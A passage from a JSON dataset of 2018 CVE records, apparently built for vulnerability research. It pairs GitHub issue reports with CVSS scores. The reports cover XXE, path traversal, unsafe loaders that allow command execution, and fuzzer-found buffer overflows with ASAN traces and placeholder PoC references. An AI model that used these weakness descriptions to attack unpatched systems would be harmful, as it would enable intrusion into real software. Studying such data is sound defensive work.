        "CVE_ID": "CVE-2018-20094",
        "Issue_Url_old": "https://github.com/xuxueli/xxl-conf/issues/61",
        "Issue_Url_new": "https://github.com/xuxueli/xxl-conf/issues/61",
        "Repo_new": "xuxueli/xxl-conf",
        "Issue_Created_At": "2018-12-05T07:40:26Z",
        "description": "\u8def\u5f84\u904d\u5386\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG APITAG APITAG = \"keys\", required = false) APITAG keys \u63a5\u6536\u4e86\u8bf7\u6c42\u4e2d\u7684\u53c2\u6570keys\uff0c\u800c\u8be5\u53c2\u6570\u662f\u53d7\u7528\u6237\u63a7\u5236\u7684\u3002 FILETAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20095",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/341",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/341",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-11T09:25:26Z",
        "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20096",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/590",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/590",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-12-10T03:07:29Z",
        "description": "Several bugs in exi NUMBERTAG rc3. I have tested them in latest version NUMBERTAG RC NUMBERTAG exi NUMBERTAG pR pngimage heap bof poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG Y NUMBERTAG O NUMBERTAG D NUMBERTAG adjust tiffimage_int out of bound read poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG M'set APITAG lang=\"de DE\" Euros' jp2image heap bof poc NUMBERTAG URLTAG NUMBERTAG iptcprint abort poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG insert jp2image infiniteloop poc NUMBERTAG URLTAG And, more info can be found at URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20133",
        "Issue_Url_old": "https://github.com/dexter2206/ymlref/issues/2",
        "Issue_Url_new": "https://github.com/dexter2206/ymlref/issues/2",
        "Repo_new": "dexter2206/ymlref",
        "Issue_Created_At": "2018-12-14T00:08:11Z",
        "description": "APITAG method is vulnerable. import ymlref.api test_str PATHTAG [\"dir\"]' APITAG Hi, there is a vulnerability in load methods in APITAG see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20145",
        "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/1073",
        "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/1073",
        "Repo_new": "eclipse/mosquitto",
        "Issue_Created_At": "2018-12-07T13:09:07Z",
        "description": "Mosquitto ignores acl_file on default listener if per_listener_settings=true. When mosquitto is configured as follows: APITAG Then the default listener (on port NUMBERTAG ignores the acl_file. This can easily confirmed by specifying a non existing acl file. Mosquitto will startup fine, without complaining about the non existing file. And when trying to send messages, there are indeed no acl's effective. This is a potential security risk!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20157",
        "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1907",
        "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1907",
        "Repo_new": "openrefine/openrefine",
        "Issue_Created_At": "2018-12-14T14:57:37Z",
        "description": "XXE Vulnerability in creating project. Describe the bug APITAG NUMBERTAG and below) has a XXE URLTAG vulnerability, that can be triggered through a data import. It is possible to steal data from an APITAG user. Please consider disabling external DTDs URLTAG . To Reproduce See the video (zipped because of GH file extension restrictions) FILETAG Current Results File content is send over FTP, no feedback is shown to the user. Desktop (please complete the following information): Tested on (desktop version is not important) ERRORTAG APITAG (please complete the following information): Version NUMBERTAG and below) Datasets ext.dtd APITAG FILETAG APITAG Additonal info Sorry that i was a bit inactive during the last issue :).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20164",
        "Issue_Url_old": "https://github.com/ua-parser/uap-core/issues/332",
        "Issue_Url_new": "https://github.com/ua-parser/uap-core/issues/332",
        "Repo_new": "ua-parser/uap-core",
        "Issue_Created_At": "2018-07-30T13:42:04Z",
        "description": "Performance issue with backtracking caused by some regexes. Hi! We are happy users of uap core via URLTAG but we have recently noticed that some regexes may lead to excessive backtracking. The regex that caused some issue for us is the following: ^(. APITAG APITAG A simple python script like the following hangs on my laptop: CODETAG The main problem seems to be backtracking caused by the various blocks with .?, that doesn't happen if the regex is split into multiple ones for example: APITAG The example that I brought up is of course a corner case, but even shorter strings with the same format can cause slow downs in parsing or hanging. It would be great to find a solution that is probably more verbose but that doesn't lead to these issues. Thanks in advance! Luca",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20186",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/342",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/342",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-17T08:48:55Z",
        "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash2.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20190",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2786",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2786",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-12-04T05:34:36Z",
        "description": "Null pointer dereference in APITAG ) APITAG I fuzzed and found another null pointer dereference problem in APITAG ) APITAG The problem exists in both the NUMBERTAG ersion and the master branch ( PATHTAG ), with the same crash stack. Build libsass/sassc with APITAG APITAG Run APITAG and program crashes. (sass_npd is at here: URLTAG Crash stack Crash stack (of master branch): ERRORTAG It seems that in function APITAG , the right variable (not Null) is casted and becomes a Null APITAG APITAG at line APITAG . CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20194",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/21",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/21",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T05:12:17Z",
        "description": "stack buffer underflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20196",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/19",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/19",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T04:08:19Z",
        "description": "stack buffer overflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20197",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/20",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/20",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T04:11:39Z",
        "description": "stack buffer underflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20198",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/23",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/23",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:17:36Z",
        "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20200",
        "Issue_Url_old": "https://github.com/square/okhttp/issues/4967",
        "Issue_Url_new": "https://github.com/square/okhttp/issues/4967",
        "Repo_new": "square/okhttp",
        "Issue_Created_At": "2019-04-19T09:16:04Z",
        "description": "CVETAG : APITAG allows man in the middle attackers to bypass certificate pinning. Apparently there was CVETAG CVETAG for an issue described as > APITAG in APITAG NUMBERTAG through NUMBERTAG allows man in the middle attackers to bypass certificate pinning by changing APITAG and the boolean values while hooking the application. A report is at URLTAG was this forwarded already?",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-20201",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1587",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1587",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-12-18T02:36:24Z",
        "description": "A stack overflow bug in NUMBERTAG Hello! I am learning AFL Fuzz recently,and I found a bug in this program POC is here URLTAG Please confirm Best regards APITAG RELEASE NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG espruino test PATHTAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG cff6 at pc NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG cef0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG cff6 thread T NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG a NUMBERTAG f in APITAG APITAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG f7 in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG ac6 in APITAG APITAG NUMBERTAG d NUMBERTAG cc in run_test PATHTAG NUMBERTAG d NUMBERTAG f2 in main PATHTAG NUMBERTAG ff8ad NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG cff6 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG e6b5 in APITAG APITAG This frame has NUMBERTAG object(s NUMBERTAG filename' APITAG NUMBERTAG b9f NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG ba NUMBERTAG f4 f4 f3 f3 f3 f NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG ba NUMBERTAG f3 f NUMBERTAG ba NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f2 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20213",
        "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/8",
        "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/8",
        "Repo_new": "devinsmith/libexcel",
        "Issue_Created_At": "2018-12-18T07:50:20Z",
        "description": "It exists a buffer overflow when use APITAG Description When specify a long name as argument\uff0cit will be buffer overflow My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG b7bc bp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG sp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG T NUMBERTAG b7bb in wbook_addworksheet PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fee4afe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG wbook_addworksheet NUMBERTAG ABORTING CREDIT APITAG Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20226",
        "Issue_Url_old": "https://github.com/TheHive-Project/Cortex/issues/158",
        "Issue_Url_new": "https://github.com/thehive-project/cortex/issues/158",
        "Repo_new": "thehive-project/cortex",
        "Issue_Created_At": "2018-12-20T10:33:43Z",
        "description": "Wrong checks of role when an user is created. Request Type Bug Work Environment Corte NUMBERTAG Problem Description The role of the user being created is not correctly check according to the role of the creating user. This implies that an organization admin is able create a super admin. Thank you, Po Hsing Wu.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20227",
        "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1210",
        "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1210",
        "Repo_new": "eclipse/rdf4j",
        "Issue_Created_At": "2018-12-18T07:46:53Z",
        "description": "zip_slip. Hi all, There is a path traversal vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as bellow: FILETAG When decompressing zip files, entries are not checked, resulting in overwriting arbitrary files by traversing directories using \u201c.. /\u201d",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20301",
        "Issue_Url_old": "https://github.com/smpallen99/coherence/issues/270",
        "Issue_Url_new": "https://github.com/smpallen99/coherence/issues/270",
        "Repo_new": "smpallen99/coherence",
        "Issue_Created_At": "2017-08-22T15:51:51Z",
        "description": "Coherence Security Issues. Thanks again for taking the time to talk with me. I'm opening an issue as per our conversation: The Coherence library has APITAG Assignment\" like vulnerabilities. In particular, \"registration\" endpoints (like creating, editing, updating), allow users to update any APITAG . This means that, among other issues, users can automatically confirm their accounts by sending the APITAG parameter with their registration request. Further, the library design and documentation encourages insecure functionality by default. For example: The \"store\" demo allows registering users to add themselves as admin: FILETAG Due to these issues, I would consider officially \"retiring\" the current version of Coherence in hex.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20302",
        "Issue_Url_old": "https://github.com/smpallen99/xain/issues/18",
        "Issue_Url_new": "https://github.com/smpallen99/xain/issues/18",
        "Repo_new": "smpallen99/xain",
        "Issue_Created_At": "2018-08-17T14:05:12Z",
        "description": "[URGENT] Security Vulnerability. Since I haven't found your email, I encrypted the following report using your public keys on APITAG If you have problems reading this message please contact me either here or via APITAG . Message Encrypted CODETAG Keys APITAG APITAG Decryption CODETAG Responsible Disclosure After the time for responsible disclosure has passed, I'll comment the password for the message here.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20303",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5558",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5558",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-12-18T01:49:02Z",
        "description": "Remote Code execution or|and Denial of Service. Gogs version (or commit ref): latest NUMBERTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [X] No it's currently down I discovered a way to gain code execution (via a bypass of the authentication to gain admin access, very similar to URLTAG or to trigger a small denial of service. Can you confirm u APITAG is still the best email to send more details? Best, Louis",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20304",
        "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/9",
        "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/9",
        "Repo_new": "devinsmith/libexcel",
        "Issue_Created_At": "2018-12-19T10:10:13Z",
        "description": "It exists a buffer overflow when use APITAG Description When specify the second parameter \uff0cit will be buffer overflow My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled ERRORTAG CREDIT APITAG Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20318",
        "Issue_Url_old": "https://github.com/Wechat-Group/weixin-java-tools/issues/889",
        "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/889",
        "Repo_new": "wechat-group/wxjava",
        "Issue_Created_At": "2018-12-20T08:13:52Z",
        "description": "XXE\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG java tools\u9879\u76ee\u5b58\u5728XXE\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a APITAG FILETAG APITAG \u6b64\u5904\u662f\u4e00\u4e2axxe\u76f2\u6ce8\uff0c\u505a\u4e2a\u7b80\u5355\u7684\u590d\u73b0 APITAG FILETAG \u65e5\u5fd7\u4fe1\u606f FILETAG \u8fd8\u671b\u53ca\u65f6\u4fee\u590d",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20325",
        "Issue_Url_old": "https://github.com/danijar/definitions/issues/14",
        "Issue_Url_new": "https://github.com/danijar/definitions/issues/14",
        "Repo_new": "danijar/definitions",
        "Issue_Created_At": "2018-12-17T09:07:26Z",
        "description": "APITAG method is vulnerable. coding=utf NUMBERTAG from definitions import Parser a = APITAG PATHTAG ) PATHTAG APITAG Hi, there is a vulnerability in APITAG method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20330",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2018-11-25T05:10:49Z",
        "description": "integer overflow in APITAG I find the bug by code review; type of \"retval\" is int, \" stride ph \" is more than sizeof int, return type is unsigned long, cause function which call APITAG get a less value, then the function use the value as \"malloc\" argument, cause heap overflow DLLEXPORT unsigned long APITAG width, int pad, int height, int subsamp) { int retval NUMBERTAG nc, i; if (subsamp NUMBERTAG subsamp >= NUMSUBOPT) APITAG Invalid argument\"); nc = (subsamp == TJSAMP_GRAY NUMBERTAG for (i NUMBERTAG i < nc; i++) { int pw = APITAG width, subsamp); int stride = PAD(pw, pad); int ph = APITAG height, subsamp); if (pw NUMBERTAG ph NUMBERTAG return NUMBERTAG else retval += stride ph; } bailout: return retval; } \u279c build git:(master) \u2717 ./tjbench PATHTAG NUMBERTAG yuv Testing YUV planar encoding/decoding FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20337",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/192",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/192",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2018-12-19T02:36:42Z",
        "description": "Stack buffer overflow bug. Hello! I am learning AFL Fuzz recently,and I found a bug in this project. POC is here URLTAG Please confirm Best regards Version release NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG disable shared ./raw identify POC Information APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffdcba9ac0 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG c3 bp NUMBERTAG fffdcba NUMBERTAG sp NUMBERTAG fffdcba NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG fffdcba9ac0 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG c2 in __interceptor_strncpy ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a9da2 in APITAG APITAG NUMBERTAG b5af2 in APITAG APITAG NUMBERTAG ce NUMBERTAG f in APITAG APITAG NUMBERTAG e4c7 in APITAG ) APITAG NUMBERTAG in APITAG const , long long) APITAG NUMBERTAG ERRORTAG c NUMBERTAG in main samples/raw APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f8 in _start ( PATHTAG ERRORTAG NUMBERTAG f8) Address NUMBERTAG fffdcba9ac0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG d in APITAG int) APITAG This frame has NUMBERTAG object(s NUMBERTAG uc NUMBERTAG uc NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG c_len NUMBERTAG table_buf NUMBERTAG e_len NUMBERTAG tag NUMBERTAG type NUMBERTAG len NUMBERTAG save NUMBERTAG c NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG c NUMBERTAG table_buf NUMBERTAG e NUMBERTAG wb NUMBERTAG wb NUMBERTAG oly_lensid NUMBERTAG words NUMBERTAG APITAG NUMBERTAG yy NUMBERTAG mm NUMBERTAG dd NUMBERTAG APITAG NUMBERTAG buffer NUMBERTAG buf NUMBERTAG ystr NUMBERTAG ynum' APITAG NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f2 f2 f2 f NUMBERTAG f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d3a NUMBERTAG f4 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20348",
        "Issue_Url_old": "https://github.com/libyal/libpff/issues/48",
        "Issue_Url_new": "https://github.com/libyal/libpff/issues/48",
        "Repo_new": "libyal/libpff",
        "Issue_Created_At": "2017-10-10T02:49:53Z",
        "description": "A stack overflow vulneribility in libpff_item_tree_create_node. Tested Version Lastest (cloned from github) Command and argument ./pffexport APITAG Crash Information The output of pffexport with address sanitizer enabled, it seems the program falls into an infinite loop. ERRORTAG gdb and backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20349",
        "Issue_Url_old": "https://github.com/igraph/igraph/issues/1141",
        "Issue_Url_new": "https://github.com/igraph/igraph/issues/1141",
        "Repo_new": "igraph/igraph",
        "Issue_Created_At": "2018-12-04T08:32:19Z",
        "description": "NULL Pointer Dereference vulneribility in igraph_i_strdiff function. Test Version dev version, git clone URLTAG Test Program modify graphml.c in examples/simple directory ERRORTAG and APITAG APITAG Gdb and Backtrace CODETAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20357",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/28",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/28",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:39:54Z",
        "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
